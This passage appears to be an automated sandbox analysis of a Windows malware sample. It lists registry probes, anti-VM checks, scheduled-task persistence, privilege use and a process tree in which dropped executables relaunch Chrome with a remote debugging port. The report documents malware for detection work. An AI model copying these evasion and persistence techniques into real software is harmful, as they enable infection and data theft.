Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5fdc363345.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5a3fcf8817.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8QQOJj9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5f8da7bbdafaed3095a2fef9f7caf45c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d7efae0799.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9222c12528.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	video.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	agndts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MAl7pjE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DF9PCFR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7nSTXG6.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	e984a62c31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7nSTXG6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	e984a62c31.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe

Delays execution with timeout.exe 2 IoCs

pid	Process
5968	timeout.exe
2340	timeout.exe

Enumerates system info in registry 2 TTPs 19 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe

Kills process with taskkill 5 IoCs

pid	Process
5984	taskkill.exe
2256	taskkill.exe
5892	taskkill.exe
4028	taskkill.exe
2132	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846840713254520"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5440	schtasks.exe
2612	schtasks.exe
3612	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3336	7tzlyz8.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1192	5f8da7bbdafaed3095a2fef9f7caf45c.exe
1192	5f8da7bbdafaed3095a2fef9f7caf45c.exe
3976	skotes.exe
3976	skotes.exe
4828	MAl7pjE.exe
4828	MAl7pjE.exe
4828	MAl7pjE.exe
4828	MAl7pjE.exe
4828	MAl7pjE.exe
4828	MAl7pjE.exe
4528	lwtLxxH.exe
4528	lwtLxxH.exe
1560	7nSTXG6.exe
1560	7nSTXG6.exe
1560	7nSTXG6.exe
1560	7nSTXG6.exe
3696	ebp51gY.exe
3696	ebp51gY.exe
1560	7nSTXG6.exe
1560	7nSTXG6.exe
3696	ebp51gY.exe
3696	ebp51gY.exe
3696	ebp51gY.exe
3696	ebp51gY.exe
4528	lwtLxxH.exe
4528	lwtLxxH.exe
3692	chrome.exe
3692	chrome.exe
1112	ftS1RPn.exe
1112	ftS1RPn.exe
4528	lwtLxxH.exe
5000	8QQOJj9.exe
5000	8QQOJj9.exe
5000	8QQOJj9.exe
5000	8QQOJj9.exe
5000	8QQOJj9.exe
5000	8QQOJj9.exe
1560	7nSTXG6.exe
1560	7nSTXG6.exe
3372	uXivbut.exe
3372	uXivbut.exe
548	chrome.exe
548	chrome.exe
4072	Gxtuum.exe
4072	Gxtuum.exe
1560	7nSTXG6.exe
1560	7nSTXG6.exe
1104	e521e66b6b.exe
1104	e521e66b6b.exe
1104	e521e66b6b.exe
1560	7nSTXG6.exe
1560	7nSTXG6.exe
2972	msedge.exe
2972	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4984	msedge.exe
4984	msedge.exe
1236	video.exe
1236	video.exe
5012	skotes.exe
5012	skotes.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
548	msedge.exe
548	msedge.exe
548	msedge.exe
548	msedge.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeDebugPrivilege	4528	lwtLxxH.exe
Token: SeShutdownPrivilege	3692	chrome.exe
Token: SeCreatePagefilePrivilege	3692	chrome.exe
Token: SeShutdownPrivilege	3692	chrome.exe
Token: SeCreatePagefilePrivilege	3692	chrome.exe
Token: SeShutdownPrivilege	3692	chrome.exe
Token: SeCreatePagefilePrivilege	3692	chrome.exe
Token: SeShutdownPrivilege	548	chrome.exe
Token: SeCreatePagefilePrivilege	548	chrome.exe
Token: SeShutdownPrivilege	548	chrome.exe
Token: SeCreatePagefilePrivilege	548	chrome.exe
Token: SeShutdownPrivilege	548	chrome.exe
Token: SeCreatePagefilePrivilege	548	chrome.exe
Token: SeShutdownPrivilege	548	chrome.exe
Token: SeCreatePagefilePrivilege	548	chrome.exe
Token: SeShutdownPrivilege	548	chrome.exe
Token: SeCreatePagefilePrivilege	548	chrome.exe
Token: SeShutdownPrivilege	548	chrome.exe
Token: SeCreatePagefilePrivilege	548	chrome.exe
Token: SeDebugPrivilege	1104	e521e66b6b.exe
Token: SeDebugPrivilege	3336	7tzlyz8.exe
Token: SeDebugPrivilege	3336	7tzlyz8.exe
Token: SeDebugPrivilege	5516	powershell.exe
Token: SeDebugPrivilege	5216	powershell.exe
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeDebugPrivilege	6088	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Token: SeDebugPrivilege	5896	powershell.exe
Token: SeDebugPrivilege	5160	powershell.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeDebugPrivilege	5984	taskkill.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	5892	taskkill.exe
Token: SeDebugPrivilege	4028	taskkill.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	2132	taskkill.exe
Token: SeDebugPrivilege	2156	firefox.exe
Token: SeDebugPrivilege	2156	firefox.exe
Token: SeDebugPrivilege	5108	AddInProcess32.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1192	5f8da7bbdafaed3095a2fef9f7caf45c.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
3692	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
548	chrome.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe

Suspicious use of SendNotifyMessage 38 IoCs

pid	Process
5324	36c0490467.exe
5324	36c0490467.exe
5324	36c0490467.exe
5184	151f9773d5.exe
5184	151f9773d5.exe
5184	151f9773d5.exe
5184	151f9773d5.exe
5184	151f9773d5.exe
5184	151f9773d5.exe
4992	5e812bac6f.exe
4992	5e812bac6f.exe
4992	5e812bac6f.exe
5184	151f9773d5.exe
5184	151f9773d5.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
2156	firefox.exe
5184	151f9773d5.exe
5184	151f9773d5.exe
5184	151f9773d5.exe
5184	151f9773d5.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3336	7tzlyz8.exe
2156	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1192 wrote to memory of 3976	1192	5f8da7bbdafaed3095a2fef9f7caf45c.exe	87
PID 1192 wrote to memory of 3976	1192	5f8da7bbdafaed3095a2fef9f7caf45c.exe	87
PID 1192 wrote to memory of 3976	1192	5f8da7bbdafaed3095a2fef9f7caf45c.exe	87
PID 3976 wrote to memory of 4828	3976	skotes.exe	88
PID 3976 wrote to memory of 4828	3976	skotes.exe	88
PID 3976 wrote to memory of 4828	3976	skotes.exe	88
PID 3976 wrote to memory of 4528	3976	skotes.exe	90
PID 3976 wrote to memory of 4528	3976	skotes.exe	90
PID 3976 wrote to memory of 1560	3976	skotes.exe	91
PID 3976 wrote to memory of 1560	3976	skotes.exe	91
PID 3976 wrote to memory of 1560	3976	skotes.exe	91
PID 3976 wrote to memory of 3696	3976	skotes.exe	92
PID 3976 wrote to memory of 3696	3976	skotes.exe	92
PID 3976 wrote to memory of 3696	3976	skotes.exe	92
PID 1560 wrote to memory of 3692	1560	7nSTXG6.exe	93
PID 1560 wrote to memory of 3692	1560	7nSTXG6.exe	93
PID 3692 wrote to memory of 540	3692	chrome.exe	94
PID 3692 wrote to memory of 540	3692	chrome.exe	94
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 3900	3692	chrome.exe	95
PID 3692 wrote to memory of 1668	3692	chrome.exe	96
PID 3692 wrote to memory of 1668	3692	chrome.exe	96
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97
PID 3692 wrote to memory of 3876	3692	chrome.exe	97

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\5f8da7bbdafaed3095a2fef9f7caf45c.exe
"C:\Users\Admin\AppData\Local\Temp\5f8da7bbdafaed3095a2fef9f7caf45c.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3976
- - C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
    "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4828
- - C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe
    "C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4528
- - C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe
    "C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1560
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3692
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa0dbdcc40,0x7ffa0dbdcc4c,0x7ffa0dbdcc58
        5⤵
        
        PID:540
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1896,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:2
        5⤵
        
        PID:3900
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2052,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2112 /prefetch:3
        5⤵
        
        PID:1668
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2480 /prefetch:8
        5⤵
        
        PID:3876
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3156 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4732
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3328 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4248
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4252 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1596
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4648 /prefetch:8
        5⤵
        
        PID:2428
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4644 /prefetch:8
        5⤵
        
        PID:1660
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4708 /prefetch:8
        5⤵
        
        PID:5000
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:548
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa2100cc40,0x7ffa2100cc4c,0x7ffa2100cc58
        5⤵
        
        PID:1520
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1916 /prefetch:2
        5⤵
        
        PID:3588
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2180 /prefetch:3
        5⤵
        
        PID:436
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2652 /prefetch:8
        5⤵
        
